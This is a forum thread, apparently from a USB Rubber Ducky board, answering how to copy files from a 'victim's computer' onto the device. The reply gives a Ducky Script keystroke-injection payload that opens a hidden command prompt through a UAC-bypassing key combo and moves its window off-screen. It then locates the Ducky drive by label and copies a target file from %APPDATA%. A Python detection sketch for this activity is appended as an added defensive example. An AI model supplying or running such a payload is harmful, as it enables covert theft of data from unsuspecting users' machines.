[Question] Saving files to the ducky from victim's computer


Scurvey

Solved by overwraith


I would probably go to https://github.com/hak5darren/USB-Rubber-Ducky/wiki and get a payload script to start up and hide the command prompt from the payloads page (make sure you have the correct encoder):

REM Target: WINDOWS VISTA
REM Encoder V2.4
REM Purpose: Hide cmd window script that uses a key combo to circumvent UAC limitations. 
DELAY 3000
CONTROL ESCAPE
DELAY 500
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
CTRL-SHIFT ENTER
DELAY 1000
ALT C
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

Then I would change directories to %APPDATA%:

STRING cd %APPDATA%
ENTER

Then I would use the popular command for finding a drive labeled ducky on a twin duck firmware ducky (make sure you have installed the twin duck firmware; also, you may have problems here if the ducky mounts slowly, tell me if you have problems):

STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d
ENTER

Then I would use the copy command using the variable of the drive determined in the previous bit of code in variable "myd":

STRING copy %APPDATA%\target_file %myd%\
ENTER

When all finished run the exit command to close the conspicuous command prompt:

STRING EXIT
ENTER

Run it a step at a time to make sure everything works, because I haven't tested this code all together yet. The hide command window has been tested; I don't see much that could go wrong.

Edited by overwraith
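
From the defender's side, the steps in the post above show up in process-creation telemetry as a cmd.exe launched with the /Q /D /T: /K switch set, followed shortly by a wmic volume-label lookup. The following detection sketch is an added example, not part of the original post; the event layout, the 60-second window and the sample events are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events: (timestamp, host, image, command line).
# The field layout is an assumption; map it to your Sysmon Event ID 1 / EDR export.
EVENTS = [
    ("2024-01-01T10:00:03", "WS01", "cmd.exe", "cmd /Q /D /T:7F /F:OFF /V:ON /K"),
    ("2024-01-01T10:00:09", "WS01", "wmic.exe", "wmic volume get driveletter, label"),
    ("2024-01-01T10:00:09", "WS01", "findstr.exe", 'findstr "DUCKY"'),
    ("2024-01-01T11:30:00", "WS02", "wmic.exe", "wmic volume get driveletter, label"),
    ("2024-01-01T12:00:00", "WS03", "cmd.exe", "cmd /K title build shell"),
]

# Echo off, AutoRun disabled, custom colours, stay open: the switch set from the post.
SHELL_SWITCHES = [r"/q\b", r"/d\b", r"/k\b", r"/t:[0-9a-f]{2}\b"]
# Key on the volume query itself; the drive label is trivially changed.
LABEL_LOOKUP = re.compile(r"\bvolume\b.*\bget\b.*\bdriveletter\b.*\blabel\b", re.I)
WINDOW = timedelta(seconds=60)  # assumed correlation window


def is_quiet_shell(image, cmdline):
    """True for a cmd.exe started with all four switches present."""
    return image.lower() == "cmd.exe" and all(
        re.search(p, cmdline, re.I) for p in SHELL_SWITCHES)


def is_label_lookup(image, cmdline):
    """True for wmic enumerating drive letters together with volume labels."""
    return image.lower() == "wmic.exe" and bool(LABEL_LOOKUP.search(cmdline))


def detect(events):
    """Return (host, timestamp, severity) for each volume-label lookup.

    Severity is 'high' when the same host started a quiet shell within WINDOW
    before the lookup, otherwise 'low'. The copy step is a cmd builtin and
    creates no process event, so it needs file or removable-media telemetry.
    """
    alerts, last_shell = [], {}
    for ts, host, image, cmdline in sorted(events):
        when = datetime.fromisoformat(ts)
        if is_quiet_shell(image, cmdline):
            last_shell[host] = when
        elif is_label_lookup(image, cmdline):
            shell = last_shell.get(host)
            paired = shell is not None and when - shell <= WINDOW
            alerts.append((host, ts, "high" if paired else "low"))
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```
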